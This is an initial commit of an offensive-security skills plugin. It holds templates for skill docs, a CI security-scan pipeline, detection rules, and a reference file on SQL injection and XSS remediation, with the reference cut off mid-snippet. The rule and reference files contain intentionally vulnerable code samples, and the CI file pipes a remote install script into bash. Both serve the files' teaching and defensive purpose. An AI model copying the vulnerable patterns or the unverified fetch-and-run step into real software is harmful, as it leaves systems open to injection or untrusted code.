Initial commit

This commit is contained in:
Zhongwei Li
2025-11-29 17:51:02 +08:00
commit ff1f4bd119
252 changed files with 72682 additions and 0 deletions

View File

@@ -0,0 +1,12 @@
{
"name": "offsec-skills",
"description": "Offensive security skills for penetration testing, network reconnaissance, exploitation, and security assessments",
"version": "0.0.0-2025.11.28",
"author": {
"name": "Sir AppSec",
"email": "sirappsec@gmail.com"
},
"skills": [
"./skills"
]
}

3
README.md Normal file
View File

@@ -0,0 +1,3 @@
# offsec-skills
Offensive security skills for penetration testing, network reconnaissance, exploitation, and security assessments

1037
plugin.lock.json Normal file

File diff suppressed because it is too large Load Diff

157
skills/_template/SKILL.md Normal file
View File

@@ -0,0 +1,157 @@
---
name: skill-name
description: >
[REQUIRED] Comprehensive description of what this skill does and when to use it.
Include: (1) Primary functionality, (2) Specific use cases, (3) Security operations context.
Must include specific "Use when:" clause for skill discovery.
Example: "SAST vulnerability analysis and remediation guidance using Semgrep and industry
security standards. Use when: (1) Analyzing static code for security vulnerabilities,
(2) Prioritizing security findings by severity, (3) Providing secure coding remediation,
(4) Integrating security checks into CI/CD pipelines."
Maximum 1024 characters.
version: 0.1.0
maintainer: your-github-username
category: [appsec|devsecops|secsdlc|threatmodel|compliance|incident-response]
tags: [relevant, security, tags]
frameworks: [OWASP|CWE|MITRE-ATT&CK|NIST|SOC2]
---
<!--
PROGRESSIVE DISCLOSURE GUIDELINES:
- Keep this SKILL.md file under 500 lines
- Only include core workflows and common patterns here
- Move detailed content to references/ directory
- Link clearly to when references should be consulted
- See: references/WORKFLOW_CHECKLIST.md for workflow pattern examples
- Challenge every sentence: "Does Claude really need this?"
-->
# Skill Name
## Overview
Brief overview of what this skill provides and its security operations context.
## Quick Start
Provide the minimal example to get started immediately:
```bash
# Example command or workflow
tool-name --option value
```
## Core Workflow
### Sequential Workflow
For straightforward step-by-step operations:
1. First action with specific command or operation
2. Second action with expected output or validation
3. Third action with decision points if needed
### Workflow Checklist (for complex operations)
For complex multi-step operations, use a checkable workflow:
Progress:
[ ] 1. Initial setup and configuration
[ ] 2. Run primary security scan or analysis
[ ] 3. Review findings and classify by severity
[ ] 4. Apply remediation patterns
[ ] 5. Validate fixes with re-scan
[ ] 6. Document findings and generate report
Work through each step systematically. Check off completed items.
**For more workflow patterns**, see [references/WORKFLOW_CHECKLIST.md](references/WORKFLOW_CHECKLIST.md)
### Feedback Loop Pattern (for validation)
When validation and iteration are needed:
1. Generate initial output (configuration, code, etc.)
2. Run validation: `./scripts/validator_example.py output.yaml`
3. Review validation errors and warnings
4. Fix identified issues
5. Repeat steps 2-4 until validation passes
6. Apply the validated output
**Note**: Move detailed validation criteria to `references/` if complex.
## Security Considerations
- **Sensitive Data Handling**: Guidance on handling secrets, credentials, PII
- **Access Control**: Required permissions and authorization contexts
- **Audit Logging**: What should be logged for security auditing
- **Compliance**: Relevant compliance requirements (SOC2, GDPR, etc.)
## Bundled Resources
### Scripts (`scripts/`)
Executable scripts for deterministic operations. Use scripts for low-freedom operations requiring consistency.
- `example_script.py` - Python script template with argparse, error handling, and JSON output
- `example_script.sh` - Bash script template with argument parsing and colored output
- `validator_example.py` - Validation script demonstrating feedback loop pattern
**When to use scripts**:
- Deterministic operations that must be consistent
- Complex parsing or data transformation
- Validation and quality checks
### References (`references/`)
On-demand documentation loaded when needed. Keep SKILL.md concise by moving detailed content here.
- `EXAMPLE.md` - Template for reference documentation with security standards sections
- `WORKFLOW_CHECKLIST.md` - Multiple workflow pattern examples (sequential, conditional, iterative, feedback loop)
**When to use references**:
- Detailed framework mappings (OWASP, CWE, MITRE ATT&CK)
- Advanced configuration options
- Language-specific patterns
- Content exceeding 100 lines
### Assets (`assets/`)
Templates and configuration files used in output (not loaded into context). These are referenced but not read until needed.
- `ci-config-template.yml` - Security-enhanced CI/CD pipeline with SAST, dependency scanning, secrets detection
- `rule-template.yaml` - Security rule template with OWASP/CWE mappings and remediation guidance
**When to use assets**:
- Configuration templates
- Policy templates
- Boilerplate secure code
- CI/CD pipeline examples
## Common Patterns
### Pattern 1: [Pattern Name]
Description and example of common usage pattern.
### Pattern 2: [Pattern Name]
Additional patterns as needed.
## Integration Points
- **CI/CD**: How this integrates with build pipelines
- **Security Tools**: Compatible security scanning/monitoring tools
- **SDLC**: Where this fits in the secure development lifecycle
## Troubleshooting
### Issue: [Common Problem]
**Solution**: Steps to resolve.
## References
- [Tool Documentation](https://example.com)
- [Security Framework](https://owasp.org)
- [Compliance Standard](https://example.com)

View File

@@ -0,0 +1,9 @@
# Assets Directory
Place files that will be used in the output Claude produces:
- Templates
- Configuration files
- Images/logos
- Boilerplate code
These files are NOT loaded into context but copied/modified in output.

View File

@@ -0,0 +1,357 @@
# Security-Enhanced CI/CD Pipeline Template
#
# This template demonstrates security best practices for CI/CD pipelines.
# Adapt this template to your specific security tool and workflow needs.
#
# Key Security Features:
# - SAST (Static Application Security Testing)
# - Dependency vulnerability scanning
# - Secrets detection
# - Infrastructure-as-Code security scanning
# - Container image scanning
# - Security artifact uploading for compliance
name: Security Scan Pipeline
on:
push:
branches: [main, develop]
pull_request:
branches: [main, develop]
schedule:
# Run weekly security scans on Sunday at 2 AM UTC
- cron: '0 2 * * 0'
workflow_dispatch: # Allow manual trigger
# Security: Restrict permissions to minimum required
permissions:
contents: read
security-events: write # For uploading SARIF results
pull-requests: write # For commenting on PRs
env:
# Configuration
SECURITY_SCAN_FAIL_ON: 'critical,high' # Fail build on these severities
REPORT_DIR: 'security-reports'
jobs:
# Job 1: Static Application Security Testing (SAST)
sast-scan:
name: SAST Security Scan
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0 # Full history for better analysis
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Run SAST Scanner
run: |
# Example: Using Semgrep for SAST
pip install semgrep
semgrep --config=auto \
--json \
--output ${{ env.REPORT_DIR }}/sast-results.json \
. || true
# Alternative: Bandit for Python projects
# pip install bandit
# bandit -r . -f json -o ${{ env.REPORT_DIR }}/bandit-results.json
- name: Process SAST Results
run: |
# Parse results and fail on critical/high severity
python3 -c "
import json
import sys
with open('${{ env.REPORT_DIR }}/sast-results.json') as f:
results = json.load(f)
critical = len([r for r in results.get('results', []) if r.get('extra', {}).get('severity') == 'ERROR'])
high = len([r for r in results.get('results', []) if r.get('extra', {}).get('severity') == 'WARNING'])
print(f'Critical findings: {critical}')
print(f'High findings: {high}')
if critical > 0:
print('❌ Build failed: Critical security issues found')
sys.exit(1)
elif high > 0:
print('⚠️ Warning: High severity issues found')
# Optionally fail on high severity
# sys.exit(1)
else:
print('✅ No critical security issues found')
"
- name: Upload SAST Results
if: always()
uses: actions/upload-artifact@v4
with:
name: sast-results
path: ${{ env.REPORT_DIR }}/sast-results.json
retention-days: 30
# Job 2: Dependency Vulnerability Scanning
dependency-scan:
name: Dependency Vulnerability Scan
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Scan Python Dependencies
if: hashFiles('requirements.txt') != ''
run: |
pip install safety
safety check \
--json \
--output ${{ env.REPORT_DIR }}/safety-results.json \
|| true
- name: Scan Node Dependencies
if: hashFiles('package.json') != ''
run: |
npm audit --json > ${{ env.REPORT_DIR }}/npm-audit.json || true
- name: Process Dependency Results
run: |
# Check for critical vulnerabilities
if [ -f "${{ env.REPORT_DIR }}/safety-results.json" ]; then
critical_count=$(python3 -c "import json; data=json.load(open('${{ env.REPORT_DIR }}/safety-results.json')); print(len([v for v in data.get('vulnerabilities', []) if v.get('severity', '').lower() == 'critical']))")
echo "Critical vulnerabilities: $critical_count"
if [ "$critical_count" -gt "0" ]; then
echo "❌ Build failed: Critical vulnerabilities in dependencies"
exit 1
fi
fi
- name: Upload Dependency Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: dependency-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 3: Secrets Detection
secrets-scan:
name: Secrets Detection
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0 # Full history to scan all commits
- name: Run Gitleaks
uses: gitleaks/gitleaks-action@v2
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
GITLEAKS_ENABLE_SUMMARY: true
- name: Alternative - TruffleHog Scan
if: false # Set to true to enable
run: |
pip install truffleHog
trufflehog --json --regex --entropy=True . \
> ${{ env.REPORT_DIR }}/trufflehog-results.json || true
- name: Upload Secrets Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: secrets-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 4: Container Image Scanning
container-scan:
name: Container Image Security Scan
runs-on: ubuntu-latest
if: hashFiles('Dockerfile') != ''
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Build Docker Image
run: |
docker build -t app:${{ github.sha }} .
- name: Run Trivy Scanner
uses: aquasecurity/trivy-action@master
with:
image-ref: app:${{ github.sha }}
format: 'sarif'
output: '${{ env.REPORT_DIR }}/trivy-results.sarif'
severity: 'CRITICAL,HIGH'
- name: Upload Trivy Results to GitHub Security
if: always()
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: '${{ env.REPORT_DIR }}/trivy-results.sarif'
- name: Upload Container Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: container-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 5: Infrastructure-as-Code Security Scanning
iac-scan:
name: IaC Security Scan
runs-on: ubuntu-latest
if: hashFiles('**/*.tf', '**/*.yaml', '**/*.yml') != ''
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Run Checkov
run: |
pip install checkov
checkov -d . \
--output json \
--output-file ${{ env.REPORT_DIR }}/checkov-results.json \
--quiet \
|| true
- name: Run tfsec (for Terraform)
if: hashFiles('**/*.tf') != ''
run: |
curl -s https://raw.githubusercontent.com/aquasecurity/tfsec/master/scripts/install_linux.sh | bash
tfsec . \
--format json \
--out ${{ env.REPORT_DIR }}/tfsec-results.json \
|| true
- name: Process IaC Results
run: |
# Fail on critical findings
if [ -f "${{ env.REPORT_DIR }}/checkov-results.json" ]; then
critical_count=$(python3 -c "import json; data=json.load(open('${{ env.REPORT_DIR }}/checkov-results.json')); print(data.get('summary', {}).get('failed', 0))")
echo "Failed checks: $critical_count"
if [ "$critical_count" -gt "0" ]; then
echo "⚠️ Warning: IaC security issues found"
# Optionally fail the build
# exit 1
fi
fi
- name: Upload IaC Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: iac-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 6: Security Report Generation and Notification
security-report:
name: Generate Security Report
runs-on: ubuntu-latest
needs: [sast-scan, dependency-scan, secrets-scan]
if: always()
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Download All Scan Results
uses: actions/download-artifact@v4
with:
path: all-results/
- name: Generate Consolidated Report
run: |
# Consolidate all security scan results
mkdir -p consolidated-report
cat > consolidated-report/security-summary.md << 'EOF'
# Security Scan Summary
**Scan Date**: $(date -u +"%Y-%m-%d %H:%M:%S UTC")
**Commit**: ${{ github.sha }}
**Branch**: ${{ github.ref_name }}
## Scan Results
### SAST Scan
See artifacts: `sast-results`
### Dependency Scan
See artifacts: `dependency-scan-results`
### Secrets Scan
See artifacts: `secrets-scan-results`
### Container Scan
See artifacts: `container-scan-results`
### IaC Scan
See artifacts: `iac-scan-results`
---
For detailed results, download scan artifacts from this workflow run.
EOF
- name: Comment on PR (if applicable)
if: github.event_name == 'pull_request'
uses: actions/github-script@v7
with:
script: |
const fs = require('fs');
const report = fs.readFileSync('consolidated-report/security-summary.md', 'utf8');
github.rest.issues.createComment({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
body: report
});
- name: Upload Consolidated Report
if: always()
uses: actions/upload-artifact@v4
with:
name: consolidated-security-report
path: consolidated-report/
retention-days: 90
# Security Best Practices Demonstrated:
#
# 1. ✅ Minimal permissions (principle of least privilege)
# 2. ✅ Multiple security scan types (defense in depth)
# 3. ✅ Fail-fast on critical findings
# 4. ✅ Secrets detection across full git history
# 5. ✅ Container image scanning before deployment
# 6. ✅ IaC scanning for misconfigurations
# 7. ✅ Artifact retention for compliance audit trail
# 8. ✅ SARIF format for GitHub Security integration
# 9. ✅ Scheduled scans for continuous monitoring
# 10. ✅ PR comments for developer feedback
#
# Compliance Mappings:
# - SOC 2: CC6.1, CC6.6, CC7.2 (Security monitoring and logging)
# - PCI-DSS: 6.2, 6.5 (Secure development practices)
# - NIST: SA-11 (Developer Security Testing)
# - OWASP: Integrated security testing throughout SDLC

View File

@@ -0,0 +1,355 @@
# Security Rule Template
#
# This template demonstrates how to structure security rules/policies.
# Adapt this template to your specific security tool (Semgrep, OPA, etc.)
#
# Rule Structure Best Practices:
# - Clear rule ID and metadata
# - Severity classification
# - Framework mappings (OWASP, CWE)
# - Remediation guidance
# - Example vulnerable and fixed code
rules:
# Example Rule 1: SQL Injection Detection
- id: sql-injection-string-concatenation
metadata:
name: "SQL Injection via String Concatenation"
description: "Detects potential SQL injection vulnerabilities from string concatenation in SQL queries"
severity: "HIGH"
category: "security"
subcategory: "injection"
# Security Framework Mappings
owasp:
- "A03:2021 - Injection"
cwe:
- "CWE-89: SQL Injection"
mitre_attack:
- "T1190: Exploit Public-Facing Application"
# Compliance Standards
compliance:
- "PCI-DSS 6.5.1: Injection flaws"
- "NIST 800-53 SI-10: Information Input Validation"
# Confidence and Impact
confidence: "HIGH"
likelihood: "HIGH"
impact: "HIGH"
# References
references:
- "https://owasp.org/www-community/attacks/SQL_Injection"
- "https://cwe.mitre.org/data/definitions/89.html"
- "https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html"
# Languages this rule applies to
languages:
- python
- javascript
- java
- go
# Detection Pattern (example using Semgrep-style syntax)
pattern-either:
- pattern: |
cursor.execute($SQL + $VAR)
- pattern: |
cursor.execute(f"... {$VAR} ...")
- pattern: |
cursor.execute("..." + $VAR + "...")
# What to report when found
message: |
Potential SQL injection vulnerability detected. SQL query is constructed using
string concatenation or f-strings with user input. This allows attackers to
inject malicious SQL code.
Use parameterized queries instead:
- Python: cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
- JavaScript: db.query("SELECT * FROM users WHERE id = $1", [userId])
See: https://owasp.org/www-community/attacks/SQL_Injection
# Suggested fix (auto-fix if supported)
fix: |
Use parameterized queries with placeholders
# Example vulnerable code
examples:
- vulnerable: |
# Vulnerable: String concatenation
user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(query)
- fixed: |
# Fixed: Parameterized query
user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))
# Example Rule 2: Hardcoded Secrets Detection
- id: hardcoded-secret-credential
metadata:
name: "Hardcoded Secret or Credential"
description: "Detects hardcoded secrets, API keys, passwords, or tokens in source code"
severity: "CRITICAL"
category: "security"
subcategory: "secrets"
owasp:
- "A07:2021 - Identification and Authentication Failures"
cwe:
- "CWE-798: Use of Hard-coded Credentials"
- "CWE-259: Use of Hard-coded Password"
compliance:
- "PCI-DSS 8.2.1: Use of strong cryptography"
- "SOC 2 CC6.1: Logical access controls"
- "GDPR Article 32: Security of processing"
confidence: "MEDIUM"
likelihood: "HIGH"
impact: "CRITICAL"
references:
- "https://cwe.mitre.org/data/definitions/798.html"
- "https://owasp.org/www-community/vulnerabilities/Use_of_hard-coded_password"
languages:
- python
- javascript
- java
- go
- ruby
pattern-either:
- pattern: |
password = "..."
- pattern: |
api_key = "..."
- pattern: |
secret = "..."
- pattern: |
token = "..."
pattern-not: |
$VAR = ""
message: |
Potential hardcoded secret detected. Hardcoding credentials in source code
is a critical security vulnerability that can lead to unauthorized access
if the code is exposed.
Use environment variables or a secrets management system instead:
- Python: os.environ.get('API_KEY')
- Node.js: process.env.API_KEY
- Secrets Manager: AWS Secrets Manager, HashiCorp Vault, etc.
See: https://cwe.mitre.org/data/definitions/798.html
examples:
- vulnerable: |
# Vulnerable: Hardcoded API key
api_key = "sk-1234567890abcdef"
api.authenticate(api_key)
- fixed: |
# Fixed: Environment variable
import os
api_key = os.environ.get('API_KEY')
if not api_key:
raise ValueError("API_KEY environment variable not set")
api.authenticate(api_key)
# Example Rule 3: XSS via Unsafe HTML Rendering
- id: xss-unsafe-html-rendering
metadata:
name: "Cross-Site Scripting (XSS) via Unsafe HTML"
description: "Detects unsafe HTML rendering that could lead to XSS vulnerabilities"
severity: "HIGH"
category: "security"
subcategory: "xss"
owasp:
- "A03:2021 - Injection"
cwe:
- "CWE-79: Cross-site Scripting (XSS)"
- "CWE-80: Improper Neutralization of Script-Related HTML Tags"
compliance:
- "PCI-DSS 6.5.7: Cross-site scripting"
- "NIST 800-53 SI-10: Information Input Validation"
confidence: "HIGH"
likelihood: "MEDIUM"
impact: "HIGH"
references:
- "https://owasp.org/www-community/attacks/xss/"
- "https://cwe.mitre.org/data/definitions/79.html"
- "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"
languages:
- javascript
- typescript
- jsx
- tsx
pattern-either:
- pattern: |
dangerouslySetInnerHTML={{__html: $VAR}}
- pattern: |
innerHTML = $VAR
message: |
Potential XSS vulnerability detected. Setting HTML content directly from
user input without sanitization can allow attackers to inject malicious
JavaScript code.
Use one of these safe alternatives:
- React: Use {userInput} for automatic escaping
- DOMPurify: const clean = DOMPurify.sanitize(dirty);
- Framework-specific sanitizers
See: https://owasp.org/www-community/attacks/xss/
examples:
- vulnerable: |
// Vulnerable: Unsanitized HTML
function UserComment({ comment }) {
return <div dangerouslySetInnerHTML={{__html: comment}} />;
}
- fixed: |
// Fixed: Sanitized with DOMPurify
import DOMPurify from 'dompurify';
function UserComment({ comment }) {
const sanitized = DOMPurify.sanitize(comment);
return <div dangerouslySetInnerHTML={{__html: sanitized}} />;
}
# Example Rule 4: Insecure Cryptography
- id: weak-cryptographic-algorithm
metadata:
name: "Weak Cryptographic Algorithm"
description: "Detects use of weak or deprecated cryptographic algorithms"
severity: "HIGH"
category: "security"
subcategory: "cryptography"
owasp:
- "A02:2021 - Cryptographic Failures"
cwe:
- "CWE-327: Use of a Broken or Risky Cryptographic Algorithm"
- "CWE-326: Inadequate Encryption Strength"
compliance:
- "PCI-DSS 4.1: Use strong cryptography"
- "NIST 800-53 SC-13: Cryptographic Protection"
- "GDPR Article 32: Security of processing"
confidence: "HIGH"
likelihood: "MEDIUM"
impact: "HIGH"
references:
- "https://cwe.mitre.org/data/definitions/327.html"
- "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/"
languages:
- python
- javascript
- java
pattern-either:
- pattern: |
hashlib.md5(...)
- pattern: |
hashlib.sha1(...)
- pattern: |
crypto.createHash('md5')
- pattern: |
crypto.createHash('sha1')
message: |
Weak cryptographic algorithm detected (MD5 or SHA1). These algorithms are
considered cryptographically broken and should not be used for security purposes.
Use strong alternatives:
- For hashing: SHA-256, SHA-384, or SHA-512
- For password hashing: bcrypt, argon2, or PBKDF2
- Python: hashlib.sha256()
- Node.js: crypto.createHash('sha256')
See: https://cwe.mitre.org/data/definitions/327.html
examples:
- vulnerable: |
# Vulnerable: MD5 hash
import hashlib
hash_value = hashlib.md5(data).hexdigest()
- fixed: |
# Fixed: SHA-256 hash
import hashlib
hash_value = hashlib.sha256(data).hexdigest()
# Rule Configuration
configuration:
# Global settings
enabled: true
severity_threshold: "MEDIUM" # Report findings at MEDIUM severity and above
# Performance tuning
max_file_size_kb: 1024
exclude_patterns:
- "test/*"
- "tests/*"
- "node_modules/*"
- "vendor/*"
- "*.min.js"
# False positive reduction
confidence_threshold: "MEDIUM" # Only report findings with MEDIUM confidence or higher
# Rule Metadata Schema
# This section documents the expected structure for rules
metadata_schema:
required:
- id: "Unique identifier for the rule (kebab-case)"
- name: "Human-readable rule name"
- description: "What the rule detects"
- severity: "CRITICAL | HIGH | MEDIUM | LOW | INFO"
- category: "security | best-practice | performance"
optional:
- subcategory: "Specific type (injection, xss, secrets, etc.)"
- owasp: "OWASP Top 10 mappings"
- cwe: "CWE identifier(s)"
- mitre_attack: "MITRE ATT&CK technique(s)"
- compliance: "Compliance standard references"
- confidence: "Detection confidence level"
- likelihood: "Likelihood of exploitation"
- impact: "Potential impact if exploited"
- references: "External documentation links"
# Usage Instructions:
#
# 1. Copy this template when creating new security rules
# 2. Update metadata fields with appropriate framework mappings
# 3. Customize detection patterns for your tool (Semgrep, OPA, etc.)
# 4. Provide clear remediation guidance in the message field
# 5. Include both vulnerable and fixed code examples
# 6. Test rules on real codebases before deployment
#
# Best Practices:
# - Map to multiple frameworks (OWASP, CWE, MITRE ATT&CK)
# - Include compliance standard references
# - Provide actionable remediation guidance
# - Show code examples (vulnerable vs. fixed)
# - Tune confidence levels to reduce false positives
# - Exclude test directories to reduce noise

View File

@@ -0,0 +1,550 @@
# Reference Document Template
This file demonstrates how to structure detailed reference material that Claude loads on-demand.
**When to use this reference**: Include a clear statement about when Claude should consult this document.
For example: "Consult this reference when analyzing Python code for security vulnerabilities and needing detailed remediation patterns."
**Document purpose**: Briefly explain what this reference provides that's not in SKILL.md.
---
## Table of Contents
**For documents >100 lines, always include a table of contents** to help Claude navigate quickly.
- [When to Use References](#when-to-use-references)
- [Document Organization](#document-organization)
- [Detailed Technical Content](#detailed-technical-content)
- [Security Framework Mappings](#security-framework-mappings)
- [OWASP Top 10](#owasp-top-10)
- [CWE Mappings](#cwe-mappings)
- [MITRE ATT&CK](#mitre-attck)
- [Remediation Patterns](#remediation-patterns)
- [Advanced Configuration](#advanced-configuration)
- [Examples and Code Samples](#examples-and-code-samples)
---
## When to Use References
**Move content from SKILL.md to references/** when:
1. **Content exceeds 100 lines** - Keep SKILL.md concise
2. **Framework-specific details** - Detailed OWASP/CWE/MITRE mappings
3. **Advanced user content** - Deep technical details for expert users
4. **Lookup-oriented content** - Rule libraries, configuration matrices, comprehensive lists
5. **Language-specific patterns** - Separate files per language/framework
6. **Historical context** - Old patterns and deprecated approaches
**Keep in SKILL.md**:
- Core workflows (top 3-5 use cases)
- Decision points and branching logic
- Quick start guidance
- Essential security considerations
---
## Document Organization
### Structure for Long Documents
For references >100 lines:
```markdown
# Title
**When to use**: Clear trigger statement
**Purpose**: What this provides
## Table of Contents
- Links to all major sections
## Quick Reference
- Key facts or commands for fast lookup
## Detailed Content
- Comprehensive information organized logically
## Framework Mappings
- OWASP, CWE, MITRE ATT&CK references
## Examples
- Code samples and patterns
```
### Section Naming Conventions
- Use **imperative** or **declarative** headings
- ✅ "Detecting SQL Injection" not "How to detect SQL Injection"
- ✅ "Common Patterns" not "These are common patterns"
- Make headings **searchable** and **specific**
---
## Detailed Technical Content
This section demonstrates the type of detailed content that belongs in references rather than SKILL.md.
### Example: Comprehensive Vulnerability Detection
#### SQL Injection Detection Patterns
**Pattern 1: String Concatenation in Queries**
```python
# Vulnerable pattern
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(query)
# Detection criteria:
# - SQL keyword (SELECT, INSERT, UPDATE, DELETE)
# - String concatenation operator (+, f-string)
# - Variable user input (request params, form data)
# Severity: HIGH
# CWE: CWE-89
# OWASP: A03:2021 - Injection
```
**Remediation**:
```python
# Fixed: Parameterized query
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))
# OR using ORM
user = User.objects.get(id=user_id)
```
**Pattern 2: Unsafe String Formatting**
```python
# Vulnerable patterns
query = f"SELECT * FROM users WHERE name = '{username}'"
query = "SELECT * FROM users WHERE name = '%s'" % username
query = "SELECT * FROM users WHERE name = '{}'".format(username)
# All three patterns are vulnerable to SQL injection
```
#### Cross-Site Scripting (XSS) Detection
**Pattern 1: Unescaped Output in Templates**
```javascript
// Vulnerable: Direct HTML injection
element.innerHTML = userInput;
document.write(userInput);
// Vulnerable: React dangerouslySetInnerHTML
<div dangerouslySetInnerHTML={{__html: userComment}} />
// Detection criteria:
# - Direct DOM manipulation (innerHTML, document.write)
# - React dangerouslySetInnerHTML with user data
# - Template engines with autoescaping disabled
// Severity: HIGH
// CWE: CWE-79
// OWASP: A03:2021 - Injection
```
**Remediation**:
```javascript
// Fixed: Escaped output
element.textContent = userInput; // Auto-escapes
// Fixed: Sanitization library
import DOMPurify from 'dompurify';
const clean = DOMPurify.sanitize(userComment);
<div dangerouslySetInnerHTML={{__html: clean}} />
```
---
## Security Framework Mappings
This section provides comprehensive security framework mappings for findings.
### OWASP Top 10
Map security findings to OWASP Top 10 (2021) categories:
| Category | Title | Common Vulnerabilities |
|----------|-------|----------------------|
| **A01:2021** | Broken Access Control | Authorization bypass, privilege escalation, IDOR |
| **A02:2021** | Cryptographic Failures | Weak crypto, plaintext storage, insecure TLS |
| **A03:2021** | Injection | SQL injection, XSS, command injection, LDAP injection |
| **A04:2021** | Insecure Design | Missing security controls, threat modeling gaps |
| **A05:2021** | Security Misconfiguration | Default configs, verbose errors, unnecessary features |
| **A06:2021** | Vulnerable Components | Outdated libraries, unpatched dependencies |
| **A07:2021** | Auth & Session Failures | Weak passwords, session fixation, missing MFA |
| **A08:2021** | Software & Data Integrity | Unsigned updates, insecure CI/CD, deserialization |
| **A09:2021** | Logging & Monitoring Failures | Insufficient logging, no alerting, log injection |
| **A10:2021** | SSRF | Server-side request forgery, unvalidated redirects |
**Usage**: When reporting findings, map to primary OWASP category and reference the identifier (e.g., "A03:2021 - Injection").
### CWE Mappings
Map to relevant Common Weakness Enumeration categories for precise vulnerability classification:
#### Injection Vulnerabilities
- **CWE-78**: OS Command Injection
- **CWE-79**: Cross-site Scripting (XSS)
- **CWE-89**: SQL Injection
- **CWE-90**: LDAP Injection
- **CWE-91**: XML Injection
- **CWE-94**: Code Injection
#### Authentication & Authorization
- **CWE-287**: Improper Authentication
- **CWE-288**: Authentication Bypass Using Alternate Path
- **CWE-290**: Authentication Bypass by Spoofing
- **CWE-294**: Authentication Bypass by Capture-replay
- **CWE-306**: Missing Authentication for Critical Function
- **CWE-307**: Improper Restriction of Excessive Authentication Attempts
- **CWE-352**: Cross-Site Request Forgery (CSRF)
#### Cryptographic Issues
- **CWE-256**: Plaintext Storage of Password
- **CWE-259**: Use of Hard-coded Password
- **CWE-261**: Weak Encoding for Password
- **CWE-321**: Use of Hard-coded Cryptographic Key
- **CWE-326**: Inadequate Encryption Strength
- **CWE-327**: Use of Broken or Risky Cryptographic Algorithm
- **CWE-329**: Not Using a Random IV with CBC Mode
- **CWE-798**: Use of Hard-coded Credentials
#### Input Validation
- **CWE-20**: Improper Input Validation
- **CWE-73**: External Control of File Name or Path
- **CWE-434**: Unrestricted Upload of File with Dangerous Type
- **CWE-601**: URL Redirection to Untrusted Site
#### Sensitive Data Exposure
- **CWE-200**: Information Exposure
- **CWE-209**: Information Exposure Through Error Message
- **CWE-312**: Cleartext Storage of Sensitive Information
- **CWE-319**: Cleartext Transmission of Sensitive Information
- **CWE-532**: Information Exposure Through Log Files
**Usage**: Include CWE identifier in all vulnerability reports for standardized classification.
### MITRE ATT&CK
Reference relevant tactics and techniques for threat context:
#### Initial Access (TA0001)
- **T1190**: Exploit Public-Facing Application
- **T1133**: External Remote Services
- **T1078**: Valid Accounts
#### Execution (TA0002)
- **T1059**: Command and Scripting Interpreter
- **T1203**: Exploitation for Client Execution
#### Persistence (TA0003)
- **T1098**: Account Manipulation
- **T1136**: Create Account
- **T1505**: Server Software Component
#### Privilege Escalation (TA0004)
- **T1068**: Exploitation for Privilege Escalation
- **T1548**: Abuse Elevation Control Mechanism
#### Defense Evasion (TA0005)
- **T1027**: Obfuscated Files or Information
- **T1140**: Deobfuscate/Decode Files or Information
- **T1562**: Impair Defenses
#### Credential Access (TA0006)
- **T1110**: Brute Force
- **T1555**: Credentials from Password Stores
- **T1552**: Unsecured Credentials
#### Discovery (TA0007)
- **T1083**: File and Directory Discovery
- **T1046**: Network Service Scanning
#### Collection (TA0009)
- **T1005**: Data from Local System
- **T1114**: Email Collection
#### Exfiltration (TA0010)
- **T1041**: Exfiltration Over C2 Channel
- **T1567**: Exfiltration Over Web Service
**Usage**: When identifying vulnerabilities, consider which ATT&CK techniques an attacker could use to exploit them.
---
## Remediation Patterns
This section provides specific remediation guidance for common vulnerability types.
### SQL Injection Remediation
**Step 1: Identify vulnerable queries**
- Search for string concatenation in SQL queries
- Check for f-strings or format() with SQL keywords
- Review all database interaction code
**Step 2: Apply parameterized queries**
```python
# Python with sqlite3
cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
# Python with psycopg2 (PostgreSQL)
cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))
# Python with SQLAlchemy (ORM)
from sqlalchemy import text
result = session.execute(text("SELECT * FROM users WHERE id = :id"), {"id": user_id})
```
**Step 3: Validate and sanitize input** (defense in depth)
```python
import re
# Validate input format
if not re.match(r'^\d+$', user_id):
raise ValueError("Invalid user ID format")
# Use ORM query builders
user = User.query.filter_by(id=user_id).first()
```
**Step 4: Implement least privilege**
- Database user should have minimum required permissions
- Use read-only accounts for SELECT operations
- Never use admin/root accounts for application queries
### XSS Remediation
**Step 1: Enable auto-escaping**
- Most modern frameworks escape by default
- Ensure auto-escaping is not disabled
**Step 2: Use framework-specific safe methods**
```javascript
// React: Use JSX (auto-escapes)
<div>{userInput}</div>
// Vue: Use template syntax (auto-escapes)
<div>{{ userInput }}</div>
// Angular: Use property binding (auto-escapes)
<div [textContent]="userInput"></div>
```
**Step 3: Sanitize when HTML is required**
```javascript
import DOMPurify from 'dompurify';
